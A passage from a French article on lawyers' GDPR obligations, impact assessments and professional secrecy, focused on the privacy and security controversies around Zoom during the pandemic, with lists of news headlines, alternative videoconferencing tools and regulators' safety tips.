croisement de données ;

personnes vulnérables (patients, personnes âgées, enfants, etc.) ;

usage innovant (utilisation d’une nouvelle technologie) ;

exclusion du bénéfice d’un droit/contrat.

Exemple : une entreprise met en place un traitement publicitaire visant à collecter les données de géolocalisation de plusieurs millions d’individus pour créer des profils publicitaires et leur afficher de la publicité ciblée en fonction de leurs déplacements  ; ce traitement remplit le critère de la collecte à grande échelle et celui de la collecte de données sensibles (données de localisation), donc la réalisation d’une AIPD sera nécessaire.

En l’absence des mesures d’évaluation des risques, l’avocat négligeant s’engage à la mise en cause de sa responsabilité. Les ordres professionnels devraient être sensibilisés à ce risque et accompagner leurs adhérents dans la recherche d’une solution conforme aux exigences du règlement.

La loi du 31 décembre 1971, et plus particulièrement par les dispositions de son article 66-5 impliquent qu’« en toutes matières, que ce soit dans le domaine du conseil ou dans celui de la défense, les consultations adressées par un avocat à son client ou destinées à celui-ci, les correspondances échangées entre le client et son avocat, entre l’avocat et ses confrères à l’exception pour ces dernières de celles portant la mention « officielle », les notes d’entretien et, plus généralement, toutes les pièces du dossier sont couvertes par le secret professionnel »

La CNIL comme d’autres autorités de protection nationale ont produit des guides en ce sens. Ici le document produit par le Irish Data Protection Commissionner. Une recommendation de la part de ANSSI est également disponible. ENISA ‘cybersecurity when working from home’.

L’utilisation de l’application Zoom n’a pas manqué d’ores et déjà de voir le jour à des procès en responsabilité :

• Zoom Sued Over Privacy, Announces Cybersecurity Upgrades
• The Facebook API kerfuffle resulted in a lawsuit [PDF], filed on Monday in California. The plaintiff in this case, Robert Cullen of Sacramento, California, The Register.

• Brittany Roush, Director at the Crypsis Group, said : “that having that kind of flexibility to ensure that critical services can carry on, especially in a crisis, does not take the teeth from the CCPA and GDPR. If anything, it demonstrates that the regulatory bodies are carrying out their essential function — which is to ensure that companies protect consumer data… In many ways, the CCPA and GDPR should take a page from HIPAA, which lowered security standards for telehealth in order to manage the critical healthcare demands of the pandemic… we do not have the luxury of time on our side to devise perfect solutions.
• Zoom Credentials Database Available on Dark Web
• Germany bans Zoom for official use
• Lessons from the Past: What Zoom can learn from Microsoft
• Elon Musk’s SpaceX bans Zoom over privacy concerns – memo
• La Direction interministérielle du numérique « déconseille fortement » l’application Zoom
• De plus en plus déconseillé, Zoom fait appel à l’ancien chef de la sécurité de Facebook 
• Why Most Should Avoid An ‘Out Of Control’ Zoom Right Now
• Dark web: Cybercriminals sell over 500,000 Zoom accounts
• Zoom Credentials Database Available on Dark Web

Ainsi en conclusion, il est impératif de bien évaluer les incidences du choix d’une technologie sur la protection des données. Un avocat manipulant des données sensibles qui lui sont confiées ou du fait de sa mission, est tenu à la plus grande vigilance. L’analyse d’impact s’impose. En son absence, la mise en cause de la responsabilité est à craindre.

Quels sont les solutions alternatives ?

Zoom alternatives :

Jitsi                                                      Tixeo recommende par l’ANSSI

BigBlueButton                                    Visio-avocats

BlueJeans                                            Skype

GotoMeeting                                       Teams

Webex

Tableau Comparatif NOYB  –  Pour la version avec liens actifs,  

Autre tableau comparatif produit par l’Autorité de protection des données Hollandaise traduit par Christopher SCHMIDT Data Privacy Specialist • Magister of Law CIPP⁄E CIPM CIPT CBSA

• CONTINUEZ A MAINTENIR L’ALERTE EN SUIVANT LE COMPTE PEARLTREES SUR LEQUEL SONT REGROUPÉS LES DERNIERES NEWS ET ARTICLE SUR CE SUJET.

Si vous teniez malgré tout à continuer à utiliser cette application, voici des conseils sur comment utiliser Zoom avec plus de sécurité :

–        How to keep your Virtual (Zoom) Meetings safe:

• Data Protection Tips for Video-conferencing. By the Data Protection Commission Ireland. In light of the recent increase in remote working, necessitated by COVID-19 mitigation measures, as well as the increased numbers keeping in touch online with friends and family, the number of people video-conferencing and video-calling has increased dramatically. This has also resulted in people using apps and services which they might not have used before, or are now using for different reasons – i.e. using an app they usually use for personal purposes now for work purposes or vice versa. Concerns have been raised about how to use these technologies to keep in touch with colleagues and loved ones in a way that is safe and secure, and ensures an adequate standard of data protection. Here are some tips to help both individuals and organisations (such as employers who might introduce new or increased videoconferencing arrangements for employees) use these services in a safe manner: https://lnkd.in/e8mpd8n

This work is licensed under a Creative Commons Attribution 4.0 International License.